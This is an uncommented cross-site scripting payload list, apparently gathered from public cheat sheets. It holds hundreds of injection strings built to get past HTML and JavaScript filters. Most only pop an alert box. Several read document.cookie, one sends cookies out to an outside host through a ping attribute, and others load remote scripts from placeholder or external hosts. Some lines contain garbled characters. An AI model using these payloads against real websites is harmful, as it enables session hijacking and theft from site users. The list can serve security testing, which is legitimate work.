myfile.txt

`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<a href=?xss=<script>>link</a>
"><img-src%3Dy-onerror%3Dconfirm(1)>
<a href=��?xss=<script>��>link</a>
"><a href=”xxx# onclick=alert(1)//[255]”></a>
<a href=”xxx# onclick=alert(1)//[64kb]”></a>
><a id=ahref=javascript&colon;a\u006cer\u0074&lpar;/Xss-By-Muhaddi/&rpar; id=xss-test>Click me</a>#a <
��><a id=��a��href=javascript&colon;a\u006cer\u0074&lpar;/Xss-By-Muhaddi/&rpar; id=��xss-test��>Click me</a>#a <
><a id=ahref=javascript&colon;a\u006cer\u0074&lpar;/xss-by-shawar/&rpar; id=xss-test>Click me</a>#a <
<a����id=a href=��onclick=alert(9)>foo</a>
"><script>alert(1)</script>
a id=CLOSURE_BASE_PATHhref=http://attacker/xss /a
<a id=�� href=����>��href=javascript:alert(9)>foo</a>
<a id=��href=http://web.site/��onclick=alert(9)>foo</a>
<a id=��http://web.site/��onclick=alert(9)<!�Vhref=a>foo</a>�V>
<a id=”x” href=’http://adspecs.yahoo.com/adspecs.php' target=”close(/*grabcookie(1)*/)”>CLICK</a><script>onblur=function(){confirm(4)}x.click();</script>
<a id=”x”><rect fill=”white” width=”1000" height=”1000"/></a>
<a id=XSS href=”about:<script>alert(‘XSS’);</script>”>
a(){};if(true){/*/alert();a=`,x={//
a(){};if(true){/*/alert();a=`,x={//”’<>\r\n\ being escaped
aim: &c:\windows\system32\calc.exe” ini=”C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat”
“/></a></><img src=1.gif onerror=alert(1)>
<A “””><IMG SRC=”javascript:confirm(1)”>
a?><img src= onerror=confirm(1)>
.ajax
a.jsp/<script>alert(‘Vulnerable’)</script>
<a language=vbs onclick=’addUser(\”11\\\”&alert(1)\\\”\”)’>add</a>
[_`${_=`ale`}`]
‘ale’%2B’rt’%2Blocation.hash.substr(1)>#(1)
ale%2Brt%2Blocation.hash.substr(1)>#(1)
alert``
A+L+E+R+T;
+alert(0)+
‘;alert(0)//\’;alert(1)//”;alert(2)//\”;alert(3)// →</SCRIPT>”>’><SCRIPT>alert(4)</SCRIPT>=&{}”);}alert(6);function xss(){//
‘;alert(0)//\’;alert(1)//”;alert(2)//\”;alert(3)// →</SCRIPT>”>’></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}”);}
alert(+’???0O2471???’)
‘;alert(0x000123)’
‘+alert(0x000123)+’
\”; alert(0x000123)
`${alert(1)/*}`*/}`
`$alert(1)}`
*/alert(1)/*
; alert(1);
?alert(1)”,
‘|alert(1)|’
‘-alert(1)-’
‘-alert(1)//
‘}};alert(1);{{‘
‘}alert(1);{‘
“-alert(1)-”
“‘-alert(1)-’”
“}]}’;alert(1);{{‘
({‘ \’(){alert(1)}})[` \`]()
(alert)(1)
)alert(1);//
[…`${alert(1)}`]
${alert`1`}`
*/alert(1)/*
\;alert(1)//
\’-alert(1)//
\’-alert(1)};{//
\’}alert(1);{//
\”;alert(1);//
\\;alert(1)//
\\��;alert(1)//
\��;alert(1)//
#*/alert(1)
alert`1`
alert(1,)//
alert(1){}{}{}{}
alert(1){}
alert(1)
‘}alert(1)%0A{‘
;alert(123);
‘;alert(123);t=’
“;alert(123);t=”
‘>alert(154)</script><script/154=’
*/alert(155)</script><script>/*
*/alert(156)”>’onload=”/*<svg/156=’
`-alert(158)”>’onload=”`<svg/158=’
<alert(192)<! — onmouseover=location=innerHTML+outerHTML>javascript:192/*00000*/
“”});});});alert(1);$(‘a’).each(function(i){$(this).click(function(event){x({y
<{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf)
alert(1) /alert`2`/i
“])},alert(1));(function xss() {//
alert(1)>//INJECTX
“alert(1)” instanceof [];
-alert(1)<javascript: onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
“-alert(1)<javascript:” onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:click me!
“-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:”click me!
alert(1)(‘lol’,’lol’)(‘lol’,’lol’)(‘lol’,’lol’)(‘lol’,’lol’).x.y.LOL()
<alert(1)<! — onclick=location=innerHTML+outerHTML>javascript:1/*click me!*/</alert(1)<! — →
`-alert(1)”>’onload=”`<svg/1=’
*/alert(1)”>’onload=”/*<svg/1=’
‘alert(1)’.replace(/.+/,eval)
“alert(1)”.replace(/./g,function(c){return String.fromCharCode(parseInt(‘26’+c.charCodeAt(0).toString(16),16))})
*/alert(1)</script><script>/*
‘>alert(1)</script><script/1=’
‘>alert(1)</script><script/1=’
alert(1)-/><script>///</textarea>
alert(1)// →</svg><script>0</script>
-alert(1)-<svg><!V
‘-alert(1)-’<svg><!V
<alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!V>
“};alert(23);a={“a”:
/alert`2`/i
“>*/alert(35)</script><script>/*<kukux//
alert&#40;1&#41
<alert(40)<! — onmouseover=location=innerHTML%2bouterHTML>javascript:1/*00000*/
`-alert(5)</script><script>`
“`-alert(67)</script><script>`
‘-alert(79)-’
‘-alert(80)//
\’-alert(81)//
(alert)(82)
alert(9)��>foo</a>
-alert(9)<javascript:” onclick=location=tagName+previousSibling.nodeValue>click me!
‘-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling.nodeValue>cript:’click me!
alert(a.source)</SCRIPT>
alert = a\u006cer\u0074
Alert = a\u006cer\u0074
alert.call(this, document.cookie)
alert(doc.domain); // The same domain as the top page
alert(document[“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
alert(document.cookie)
alert(document[‘cookie’])
; alert(document.cookie); var foo=
��; alert(document.cookie); var foo=��
‘);alert(‘done’);var b=(‘
alert(/foo bar/.source)
“;alert(“I am coming again~”);”
}alert(/INJECTX/);{//
alert(‘Latitude:’+p.coords.latitude+’,Longitude:’+
alert&lpar;1&rpar;
alert;pg(“XSS”)
‘;alert(String&#46;fromCharCode(88,83,83))//\’;alert(String&#46;fromCharCode(88,83,83))//\”;alert(String&#46;fromCharCode(88,83,83))//\\”;alert(String&#46;fromCharCode(88,83,83))// — &gt;&lt;/SCRIPT&gt;\”&gt;’&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
//”;alert(String.fromCharCode(88,83,83))
‘;alert(String.fromCharCode(88,83,83))//
alert(String.fromCharCode(88,83,83));’))”>
alert(String.fromCharCode(88,83,83));’))”>
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// —
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//&#45;&#45;></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<”’;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
‘;;alert(String.fromCharCode(88,83,83))//\’;;alert(String.fromCharCode(88,83,83))//”;;alert(String.fromCharCode(88,83,83))//\”;;alert(String.fromCharCode(88,83,83))// →;<;/SCRIPT>;”;>;’;>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
‘;alert(String.fromCharCode(88,83,83))//’;alert(String. fromCharCode(88,83,83))//”;alert(String.fromCharCode (88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// — /SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//\’; alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//\”; alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//></SCRIPT> — !><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//></SCRIPT>! — <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//></SCRIPT>! — <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//V></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
alert(String.fromCodePoint(88,83,83))
alert(String(/xss/).substr(1,3))
alert(this[“\x64\x6f\x63\x75\x6d\x65\x6e\x74” ][“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
alert(this[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
alert(unescape(escape(/????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????/).replace(/u.{8}/g,[])))
alert(unescape(escape(/??/).replace(/u.{8}/g,[])))
alert(win == window); // false
alert&#x28;1&#x29
‘;alert(/xss/)///
);alert(Xss);//
��);alert(��Xss��);//
‘|alert(‘XSS’)|’
‘); alert(‘XSS
“;alert(‘XSS’);//
\”;;alert(‘;XSS’;);//
\”;alert(‘XSS’);//
\\”;alert(‘XSS’);//
: ({[alert`xss`]:1})
({[alert`xss`]:1})
‘;alert(/xss/)///’;alert(1)//”;alert(2)///”;alert(3)// →</SCRIPT>”>’><SCRIPT>alert(/xss/)</SCRIPT>=&{}”);}alert(6);functions+xss(){//
);alert(xss-by-shawar);//
alert(/xss/.source)
‘); alert(‘xss’); var x=’
\\’); alert(\’xss\’);var x=\’
��); alert(��XSS Vulnerability��); void(��0 ‘ “/>”><img src=x onerror=prompt(/XSS/)>
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
/ale/.source + /rt/.source
alt=’”name=’onerror=alert()//’
alt= onclick=alert(1)
alt=””onclick=”alert(1)”
alt=``onload=alert(1)
al\u0065rt(1)
al\u0065rt(87)
always>%20<param%20name=url%20value=https://l0.cm/xss.swf>
always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E
<a name=javascript:alert(1) href=//target.com/?xss=<svg/onload=location=name//>CLICK</a>
angular.bind(self, alert, 9)()
angular.element.apply(alert(9))
<animate attributeName=”onunload” to=”alert(1)”/>
<animate attributeName=”xlink:href” begin=”0" from=”javascript:alert(1)” to=”&” />
/><animate attributeName=”xlink:href” values=”;javascript:alert(1)”
<animation xlink:href=”data:text/xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/>
<animation xlink:href=”javascript:alert(1)”/>
<anytag onclick=alert(16)>M
<anytag onmouseover=alert(15)>M
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
anythinglr00</script><script>alert(document.domain)</script>uxldz
<anything onbeforescriptexecute=confirm(1)>
<anything onmouseover=javascript:confirm(1)>
<a onclick=alert(18)>M
<a=” onclick=”alert(1)//”>clickme</a>
<a onclick=”i=createElement(‘iframe’);i.src=’javascript:alert(/xss/)’;x=parentNode;x.appendChild(i);” href=”#”>Test</a>
<a oncut=alert(1)>
<a/oncut=alert(1)>
<a onhelp=’eval(href+”confirm(1)”)’contenteditable=’true’href=’&#32;javascript:’>click</a>
<a onkeydown=alert(document.cookie)>xxs link</a>
<a onkeypress=”alert(document.cookie)”>xxs link</a>
<a onkeypress=alert(document.cookie)>xxs link</a>
<a onkeyup=”alert(document.cookie)”>xxs link</a>
[[a|onload=alert(1)]]
<a onload=”alert(document.cookie)”>xxs link</a>
<a onload=alert(document.cookie)>xxs link</a>
</a onmousemove=”alert(1)”>
<a/onmousemove=alert(1)//>renwax23
<a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3 B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x 6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>CLICK
<a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>CLICK
<a onmouseover%3D”alert(1)”>renwax23
<a onmouseover=alert(17)>M
<a onmouseover=”alert(document.cookie)”>xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<a onmouseover=”javascript:window.onerror=alert;throw 1>
<a onmouseover=location=’&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#10 1&#114&#116&#40&#49&#41'>a<a>
<a onmouseover=location=’&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'>a<a>
<a onmouseover=location=��javascript:alert(1)>click
<a onmouseover=location=javascript:alert(1)>click
<a onmouseover=location=zjavascript:alert(1)>click
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec
<a/onmouseover[\x0b]=location=’\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B’>
<a/onmouseover[\x0b]=location=’\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B’>xss
a. ping=`//pkav/?${escape(document.cookie)}`
&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))// — &gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
&apos;&apos;;! — &quot;&lt;XSS&gt;=&amp;{()}
appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>
appendChild(createElement(“script”)).src=”//HOST:PORT”},0)>
<APPLET+CODE=””+CODEBASE="http://url/xss">
<applet code=javascript:alert(‘sgl’)>
<applet code=”javascript:confirm(document.cookie);”>
<Applet code = “javascript: confirm (document.cookie);”>
<applet code=”javascript:confirm(document.cookie);”> // Firefox Only
<applet/object onerror=alert(‘XSS’)>
<applet onerror=”alert(1)”></applet>
<applet onerror applet onerror=”javascript:javascript:alert(1)”></applet onerror>
<applet onError applet onError=”javascript:javascript:alert(1)”></applet onError>
<applet onreadystatechange applet onreadystatechange=”javascript:javascript:alert(1)”></applet onreadystatechange>
<applet onReadyStateChange applet onReadyStateChange=”javascript:javascript:alert(1)”></applet onReadyStateChange>
&a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
<a rel=”noreferrer” href=”//google.com”>click</a>
<a rel=”noreferrer” href=”//xss.cx”>click</a>
arg 1�Galert(1)
Array.from([1],alert)
Array.map([1],alert)
Array.prototype[Symbol.hasInstance]=eval;”alert(1)” instanceof [];
Array[Symbol.species].constructor(‘alert(1)’)();
<article xmlns =”urn:img src=x onerror=xss()//” >renwax23
a?<script>alert(‘Vulnerable’)</script>
ascript:alert(‘XSS’);”>
?asfunction:getURL,javascript:alert(1)//”,
ASP a = val1,val2
ASP.NET a = val1,val2
<a style=”behavior:url(#default#AnchorClick);” folder=”javascript:alert(1)”>click</a>
<a style=”behavior:url(#default#AnchorClick);” folder=”javascript:javascript:alert(1)”>XXX</a>
<a style=”-o-link:’javascript:alert(1)’;-o-link-source:current”>X</a>
<a style=”-o-link:’javascript:javascript:alert(1)’;-o-link-source:current”>X
<a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”alert(1);”>XXX</a></a><a href=”javascript:alert(2)”>XXX</a>
<a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”javascript:alert(1);”>XXX</a></a><a href=”javascript:javascript:alert(1)”>XXX</a>
</a style=””xx:expr/**/ession(document.appendChild(document.createElement(‘script’)).src=’http://h4k.in/i.js')">
<a target=_blank href=”data:text/html,<script>confirm(opener.document.body.innerHTML)</script>”>clickme in Opera/FF</a>
“‘> →<a/target=_blank href=//go.bmoine.fr/tab-nabbing>Polyglot XSS</a>
<a target=”x” href=”xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
<a target=”x” href=”xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
<a target=”x” href=”xssme?xss=<script>find(‘cookie’); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate(‘//script/text()’, doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = ‘(.*?)’/)[1])</script>
<a target=”x” href=”xssme?xss=<script>find(‘cookie’); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate(‘//script/text()’, doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = ‘(.*?)’/)[1])</script>
<a target=”x” href=”xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘.’, true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
<a target=”x” href=”xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘.’, true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
<a target=”x” href=”xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
atob.constructor(atob`YWxlcnQoMSk`)``
atob.constructor(atob(/YWxlcnQoMSk/.source))()
atob.constructor(unescape([…escape((??????????????????????????????????????????????????=?=>?).name)].filter((?,?)=>?%12<1|?%12>9).join([])))()
atob(“YWxlcnQoMSk=”)
atob`YWxlcnQoMSk` instanceof window
[atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval(‘a,alert(1),a’)}}
{{ ‘a’[{toString:false,valueOf:[].join,length:1,0:’__proto__’}].charAt=[].join; $eval(‘x=alert(1)//’); }}
{{‘a’[{toString:[].join,length:1,0:’__proto__’}].charAt=’’.valueOf;$eval(“x=’”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+”’”);}}
.attr
attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
\’-a\u{6c}e\u{72}t(1))%0a →
<audio onerror=”javascript:alert(1)”><source>//INJECTX
<AuDiO/**/oNLoaDStaRt=’(_=/**/confirm/**/(1))’/src><! — renwax23
<audio src=1 href=1 onerror=”javascript:alert(1)”></audio>
<audio src=1 onerror=alert(1)>
<audio src=”data:audio/mp3,%FF%F3%84%C4%FF%F3%14% C4" oncanplay=”alert(1)”>
<audio src onloadstart=alert(1)>
<audio src onloadstart=alert(101)>
<audio src=x onerror=confirm(“1”)>
<audio src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>
“ autofocus onfocus=alert(1) “
“autofocus/onfocus=alert(1)//
“autofocus/onfocus=alert(1)
autofocusonfocus=alert(1)//
‘“/autofocus/onfocus=’alert(1)’x=
“autofocus/onfocus=alert(78)//
‘ autofocus onkeyup=’javascript:alert(123)
“ autofocus onkeyup=”javascript:alert(123)
“autof<x>ocus o<x>nfocus=alert<x>(1)//
<AutoStart>1</AutoStart>
avascript&#x3A;alert&lpar;document&period;cookie&rpar;
<A?vg><A?cript/href=//aEa?L>
<a[\x0B]
<a xlink:href=”http://google.com">
<a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/></a>
<a xmlns:xlink=��http://www.w3.org/1999/xlink�� xlink:href=��javascript:alert(9)��>
><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/Xss-By-Muhaddi/&rpar;>ClickMe
��><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/Xss-By-Muhaddi/&rpar;>ClickMe
><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/XSS-by-Shawar/&rpar;>ClickMe
a{xxx:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29}
a{xxx:expression(if(!window.x){alert(‘xss’);window.x=1;})}
<a z=&x=& onmousemove=t=Object(window.name);
<a z=&x=& onmousemove=t=Object(window.name);({$:#0=t,z:eval(String(#0#).replace(/@/g,))}).z//>
b=`*/(1)}`;

<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
<BackgroundColor>FFFFFF</BackgroundColor>
background-repeat:no-repeat V><math><!V
background:url(‘//brutelogic.com.br/webgun/img/youtube1.jpg’);
background:url(//brutelogic.com.br/webgun/img/youtube1.jpg);background-repeat:no-repeat V><math><!V
<b/alt=”1"onmouseover=InputBox+1
<b/alt=”1"onmouseover=InputBox+1 language=vbs>test</b>
<b/alt=”1"onmouseover=InputBox+1language=vbs>test</b>
banner.swf?clickTAG=javascript:alert(1);//
base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<base href=//0>
<base href=data:/,0/><script src=alert(1)></script>
<base href=data:/,alert(1)/><script src=”jquery.js”></script>
<base href=”/\evil”>
<base href=javascript:/0/><iframe src=,alert(1)></iframe>
<base href=”javascript:\”> <a href=”//%00confirm(2);//”>XSS</a>
<base href=”javascript:\”> <a href=”//%0a%0dconfirm(2);//”>XSS</a>
<base href=”javascript:\”> <a href=”//%0aalert(/1/);//”>link</a>
<base href=”javascript:\”> <a href=”//%0aconfirm(2);//”>XSS</a>
<base href=”javascript:/”><a href=”**/alert(1)”><base href=”javascript:/”><a href=”**/alert(1)”>
<base href=”javascript:\”> <a href=”//xss.cx/xss.js”>XSS</a>
<base+href=”javascript:alert(1);//”>
<BASE href=”javascript:alert(‘X8SS’);//”>
<;BASE HREF=”;javascript:alert(‘;XSS’;);//”;>;
<BASE HREF=”javascript:alert(‘XSS’);//”>
<BASE HREF=”javascript:alert(‘XSS’);//”>
<BASE HREF=”javascript:alert(XSS);//”>
<BASE HREF=”javascript:confirm(‘XSS’);//”>
<base HREF=”javascript:document.vulnerable=true;//”>
<BASE HREF=”javascript:javascript:alert(1);//”>
<base/href=j&#x041va&#83cript&#x3a&#x2f>
?base=javascript:alert(0)”,
<base target=”<script>alert(1)</script>”><a href=”javascript:name”>CLICK</a>
?baseurl=asfunction:getURL,javascript:alert(1)//”,
<b class=”ng-include:’//evil’’”>
%BCscript%BEalert(%A21%A2)%BC/script%BE
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
begin=”0s” dur=”0.1s” fill=”freeze”/>
<BGSOUND id=XSS SRC=”javascript:alert(‘XSS’);”>
<bgsound onPropertyChange bgsound onPropertyChange=”javascript:javascript:alert(1)”></bgsound onPropertyChange>
<bgsound+src=”javascript:alert(1);”>
<BGSOUND src=”javascript:alert(‘XjSS’);”>
<;BGSOUND SRC=”;javascript:alert(‘;XSS’;);”;>;
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
<BGSOUND SRC=”javascript:alert(‘XSS’);”
<BGSOUND SRC=”javascript:alert(XSS);”>
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
<BGSOUND SRC=”javascript:confirm(‘XSS’);”>
<bgsound src=”javascript:document.vulnerable=true;”>
<bgsound SRC=”javascript:document.vulnerable=true;”>
<BGSOUND SRC=”javascript:javascript:alert(1);”>
<blah style=”blah:expression(alert(1))” />
<blink/ onmouseover=pr&#x6F;mpt(1)>OnMouseOver {Firefox & Opera}
[<blockquote cite=”]”>[“ onmouseover=”alert(‘RVRSH3LL_XSS’);” ]
<b><noscript><a src=’x’ style=’x:\3c\2fnoscript\3e\3ciframe/onload\3d alert(1)\3e’>
</body>
<BoDy%0AOnpaGeshoW=%2bwindow.prompt(1)
body.appendChild(createElement(‘script’)).src=’//DOMAIN’
<BODY BACKGROUND=”javascript:alert(‘XeSS’)”>
<;BODY BACKGROUND=”;javascript:alert(‘;XSS’;);”;>;
